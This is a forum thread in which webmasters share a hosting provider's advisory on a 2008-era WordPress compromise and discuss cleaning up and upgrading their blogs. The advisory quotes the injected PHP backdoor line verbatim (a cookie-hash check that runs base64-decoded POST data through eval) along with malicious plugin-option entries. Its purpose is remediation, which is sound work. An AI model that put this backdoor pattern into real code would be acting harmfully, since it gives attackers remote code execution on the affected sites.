Wordpress Exploits

[walrus]

They must be on the rise as I just recieved this e-mail from my new host

Quote:

Over the last couple of weeks there has been a widespread WordPress exploit that seems to have infected all versions of WordPress except for the most recent release (2.5.1) and

has started to hit accounts hosted on our servers.
You can read more about the exploit here:

http://wordpress.org/support/topic/168964?replies=30

It has been noted that one exploited install on a server may affect all installs on the same server.
Besides upgrading your install to the most recent release, there are a few other things to look for and the steps required to clean-up the exploit.
Before doing anything please BACKUP your database(s). This can be done in your control panel under the "Database Management" link. The database backup will be placed in the

/BACKUPS directory and accessible via FTP.


1) New files named wp-info.txt which contain database usernames and passwords.

This file will contain user info dumped from your database (emails, usernames, passwords, etc.)
If you do find this file, remove it AND change all of your passwords including your visitors' passwords.
On the few WordPress installs that we have investigated we have not come across this file yet, so this file may or may not exist on an infected install.


2) New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories.

These files will have the same name as an existing file but will have one of the following extensions:

_new.php
_old.php
.php.pngg
.php.jpgg
.php.giff

These files are executable when called from a browser and will display a fake 404 error, but will display server system info when called from a script with the matching hash from

one of the hacked php scripts.
Delete these files if found.


3) Extra code added to the first line of PHP files.

This code is added to the first line of php files and provides access to the backdoor account.
The letters and numbers in the code may vary from the following, but it will have the same format:

?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?

This code will need to be removed from each file.
On the few WordPress installs that we have investigated, this line has only been seen in files with the extensions from step 2.


4) New "WordPress" user in database (hidden in the admin panel user's page).

This user will have no info saved for password and an add date of all zeroes.
You will need to delete this user. You can do this via phpMyAdmin. There is a link to phpMyAdmin in your control panel Database Management page.
Browse the wp_users table and remove the "WordPress" user.


5) WordPress version changed to 2.5

Although you are running an older version of WordPress, your admin panel may say that you are running version 2.5
Entries in your wp_options table > active_plugins record may have entries similar to the following:

i:3;s:54:"../../wp-content/themes/xxxx/404_old.gif";
i:4;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpnyQVsn/sess_1695814591293aea19710bfb3dcfc0b9";

Remove these entries by editing the record with phpMyAdmin.
Browse the wp_options table and edit the active_plugins record.


6) Upgrade your WordPress to the most recent version.

Upgrade immediately.
You can download version 2.5.1 here: http://wordpress.org/latest.zip
Instructions for upgrading your install can be found here: http://codex.wordpress.org/Upgrading_WordPress

Although WordPress suggests/requires some directories to be 777 to function, do NOT set them to 777.
Specifically the /wp-uploads, /wp-themes, and /wp-plugins directories are set to 777 so that you can edit them in the administration panel, but this is an open door for a hacker.
755 is the maximum permissions that should be set on any directory.


If you believe your WordPress install has been exploited, open a ticket (support@atcihosting.com) and we can run a search and removal of the files listed in steps 1 and 2.
You will need to complete the rest of the steps in order to clean your install.


Please contact us with any questions.

So on top of trying to get something going on XXX Blog and Porn Blog Surfer...and having lost the database to LO...I now get to upgrade all of my WP installs, change out plug-ins, and modify templates for the new WP.

Sometimes the gods just like to fuck with you!

[Ms Naughty]

I shall name today "Upgrade day."

[Fonz]

Hmmm... I might do some upgrades today if I find a few spare minutes...

[Simon]

Remember that one thing added to 2.5.x is a new constant called SECRET_KEY in your wp-config.php file. So if you're used to not creating a new wp-config.php file during an upgrade, be sure that you do it this time. Just enter the config info from your old file into your new new one, and set your 'secret phrase' as instructed. This will help secure your blog too.

[ronnie]

Looks like we have the same host..

[ronnie]

Gee, I went to post on my newly upgraded blog and for some reason the add image fuction was not working. I went to check the permission settings on my uploads folder, think maybe my host changed it because of all the problems. Come to find out, I found all the stuff every one was talking about! AARGGHH. lol

Sneaky, the blg looked all right and seemed all right.

Here is a very prime example why you shouldn't have anything permissioned to 777. Remember some one not long ago saying to set theme's to 777. If mine was I would have stuff in there as well. I was dumb enough to have/leave my uploads to 777 and thats the only place I found the garbage.

People don't have anything set to 777! Doesn't take any longer to edit theme's in a web editor either.

[ronnie]

Quote:

Originally Posted by Simon

Remember that one thing added to 2.5.x is a new constant called SECRET_KEY in your wp-config.php file. So if you're used to not creating a new wp-config.php file during an upgrade, be sure that you do it this time. Just enter the config info from your old file into your new new one, and set your 'secret phrase' as instructed. This will help secure your blog too.

I am kinda confused. In the new 2.5.1 config file it says you do not have to remember the secret key. If so, what is it for then? Thought it was like a password or secret password.

[Simon]

Ronnie, that's correct, you'll never need to enter the SECRET_KEY anywhere else. WordPress uses what's entered in your wp-config.php file to help make more-secure cookies.

One very important note for anyone who installed a fresh copy of 2.5.x and just left the default value in the SECRET_KEY. If you leave it that way you're making it very easy for hackers since they can use that default value ("put your unique phrase here") to find their way into some places you'd rather they stay out of.

Generate a unique SECRET_KEY for each blog by using this link...
http://api.wordpress.org/secret-key/1.0/



.

[Ms Naughty]

Thanks for the info on the secret key stuff Simon. I should read the documentation a bit more!

[ronnie]

Thanks Simon, makes sense... And ya, can see how leaving the default will make it easier for hackers to find.

Some what similar to leaving the WP default passwords, for reasons I am not going to say (least with 2.3.x), it's pretty easy to at least narrow it down by quite a bit.

One thing also for any one getting rid of this exploit, or reading this, kinda got me stuck for a second. Step 5 is kind of vague. You need to remove that entry completely from the DB, which will deactivate all your plugin's. Then go back in and activate your plugin's and WP will add the right entry for that field. At first, I wasn't totally sure if I needed to completely remove it and if I did, if it would mess up my plugins.

As I mentioned the image add on one of my blogs was not working, I did the steps above and now works like a charm.

[ronnie]

One other thing, the above steps are kind of off. You should do step 5 first, then back up your database, otherwise your just backing up the exploit.

You could make a mental note, but I know I'd forget in a couple weeks..

[Trev]

Thanks Walrus. I was was going back and forth on whether or not I should upgrade our blogs and this made it clear that it was time. Six upgrades later (4 of which have never been used - 2 really old), here I sit hoping all is well.

Thanks also, Simon.

[blogman]

greate post, thanks man

[ronnie]

Finally done, 15 blogs upgraded and hopefully more secure.

I found this crap on every one of my blogs, including my mainstream one.

Actually I think it was a good thing this happened, oddly enough. I was forced to backup, blogs more secure, upgraded to the latest and greatest WP and got to clean up a bunch of junk like unused theme's and plug-ins. So not all bad..